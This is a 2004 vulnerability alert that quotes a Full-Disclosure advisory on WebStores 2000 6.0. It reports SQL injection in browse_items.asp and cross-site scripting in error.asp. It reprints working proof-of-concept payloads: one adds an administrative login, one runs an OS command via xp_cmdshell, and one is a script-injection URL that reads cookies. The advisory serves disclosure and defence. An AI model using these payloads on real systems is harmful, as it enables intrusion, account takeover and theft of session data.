Webstores 2000 Has More Input Validation Flaws in 'browser_item_details.asp' That Let Remote Users Inject SQL Commands and Execute OS Commands
|
|
SecurityTracker Alert ID: 1009115
|
|
CVE Reference: CAN-2004-0304
, CAN-2004-0305
(Links to External Site)
|
Updated: Mar 23 2004
|
Original Entry Date: Feb 18 2004
|
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Advisory: S-Quadra Security Research
|
Version(s): 6.0
|
Description: Some input validation vulnerabilities were reported in WebStores 2000. A remote user can inject SQL commands and execute arbitrary
operating system commands on the target system. A remote user can also conduct cross-site scripting attacks.
S-Quadra reported some additional variables in the 'browse_item_details.asp' script that are not properly validated [CVE: CAN-2004-0304].
A remote user can supply specially crafted data to inject SQL commands to be executed by the underlying database. [Editor's note:
In June 2003, 1ndonesian Security Team reported that SQL injection was possible via the 'Item_id' variable; see Alert ID 1006893.]
It
is reported that a remote user can gain administrative access on the application and can execute arbitrary operating system commands
via the xp_cmdshell function.
Some demonstration exploit URLs are provided [the first adds a new administrative account and the
second executes 'dir c:' on the target system]:
Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25%27+AND+Store_Items.Show+%3C%3E+0+AND+Store_
Item_Keyword.Store_id%3D1000+and+Store_Items.Store_id%3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1_name%2C+
Store_Items.U_d_2_name%2CStore_Items.U_d
_3_name%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store_Items.Retail_Price%2C+Store_Items.ImageS_id%2C+Sto
re_Items.Item_Weight%2C+Store_Items.Q
uantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Price_special_Discount%2C+Store_Items.Special_start_d
ate%2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Item_Keyword.Item_Id%29+DESC%3Binsert+into+Mall_Logins+%2
8Mall_User_Id%2C+Mall_Password%29+values+%281%2C2%29
--&Search_Store.x=0&Search_Store.y=0
Posting this data to browse_items.asp executes 'dir c:' command
Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&
SEARCH_SKU=%25%27+AND+Store_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%3D1000+and+Store_Items.Store_id%3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Item
s.U_d_1_name%2C+
Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2
C+Store_Items.Retail_Price%2C+Store_Items.ImageS_id%2C+Store_Items.Item_Weight%2C+Store_Items.Q
uantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Re
tail_Price_special_Discount%2C+Store_Items.Special_start_date%2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Item_Keyword.Item_Id%29+DESC%3Bexec+master..xp_cmdshe
ll+%
27dir+c%3A+%3E+c%3A%5Cresdirc.txt%27--&Search_Store.x=39&Search_Store.y=4
It is also reported that the 'error.asp' script
does not filter HTML code from user-supplied input before displaying the information [CVE: CAN-2004-0305]. A remote user can create
a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's
browser. The code will originate from the site running the WebStores 2000 software and will run in the security context of that
site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated
with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as
the target user. A demonstration exploit URL is provided:
http://[target]/error.asp?Message_id=35<script>alert(document.cookie)</script>
The
vendor was reportedly notified on February 13, 2004.
|
Impact: A remote user can execute arbitrary SQL commands and arbitrary operating system commands on the target system.
A remote user can
access the target user's cookies (including authentication cookies), if any, associated with the site running the WebStores 2000
software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the
target user.
|
Solution: The vendor has reportedly fixed the flaws.
[Editor's note: We did not find any notice of the fix on the vendor's public web site.]
|
Vendor URL: www.webcortex.com/site2000/products.asp (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Windows (Any)
|
Reported By: Nick Gudov <cipher@s-quadra.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 18 Feb 2004 16:49:10 +0300
From: Nick Gudov <cipher@s-quadra.com>
Subject: [Full-Disclosure] WebCortex Webstores2000 version 6.0 multiple security vulnerabilities
|
S-Quadra Advisory #2004-02-18
Topic: WebCortex Webstores2000 version 6.0 multiple security vulnerabilities
Severity: High
Vendor URL: http://www.webcortex.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040218.txt
Release date: 18 Feb 2004
1. DESCRIPTION
Webstores2000 is a complete solution for building shopping carts and
shopping malls
for e-commerce enabled sites. Its written on ASP, works on most Windows
platforms
and uses MS Access or MS SQL Server as a backend.
Please visit http://www.webcortex.com for information about Webstores2000.
2. DETAILS
-- Vulnerability 1: SQL Injection vulnerability
An SQL Injection vulnerability has been found in the 'browse_items.asp'
script
User supplied input is not filtered before being used in a SQL query.
Consequently,
query modification using malformed input is possible.
Successfull exploitation of this vulnerability could allow an attacker
to gain
administrative access to shopping mall and read any information from
database (i.e. customers private data). Also an attacker could execute
arbitrary
commands using xp_cmdshell function.
-- Vulnerability 2: Cross Site Scripting vulnerability in 'error.asp'
By injecting specially crafted javascript code in url and tricking a
user to visit
it a remote attacker can steal user session id and gain access to user's
personal data.
--PoC code
--Vulnerability 1:
Platform: MS SQL Server as a backend
Posting this data to browse_items.asp creates new administrative account
Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25%27+AND+St
ore_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%3D1000+and+Store_Items.Store_id%3D1000+GROUP+
BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1_name%2C+
Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_I
d%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store_Items.Retail_Price%2C+Store_Items.ImageS_i
d%2C+Store_Items.Item_Weight%2C+Store_Items.Q
uantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Price_special_Discount%
2C+Store_Items.Special_start_date%2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Item_Keyword
.Item_Id%29+DESC%3Binsert+into+Mall_Logins+%2
8Mall_User_Id%2C+Mall_Password%29+values+%281%2C2%29--&Search_Store.x=0&Search_Store.y=0
Posting this data to browse_items.asp executes 'dir c:' command
Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25%27+AND+St
ore_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%3D1000+and+Store_Items.Store_id%3D1000+GROUP+
BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1_name%2C+
Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_I
d%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store_Items.Retail_Price%2C+Store_Items.ImageS_i
d%2C+Store_Items.Item_Weight%2C+Store_Items.Q
uantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Price_special_Discount%
2C+Store_Items.Special_start_date%2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Item_Keyword
.Item_Id%29+DESC%3Bexec+master..xp_cmdshell+%
27dir+c%3A+%3E+c%3A%5Cresdirc.txt%27--&Search_Store.x=39&Search_Store.y=4
-- Vulnerability 2:
http://[target]/error.asp?Message_id=35<script>alert(document.cookie)</script>
3. FIX INFORMATION
S-Quadra alerted WebCortex development team to this issue on 13th
February 2004.
The following response from Shay Sabah has been received:
"OK... All of these have been fixed...
Now, I ask you to please STOP using our software and making all these
"security" emails..."
4. CREDITS
Nick Gudov <cipher@s-quadra.com> is responsible for discovering this issue.
5. ABOUT
S-Quadra offers services in computer security, penetration testing and
network assesment,
web application security, source code review and third party product
vulnerability assesment,
forensic support and reverse engineering.
S-Quadra Advisory #2004-02-18
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
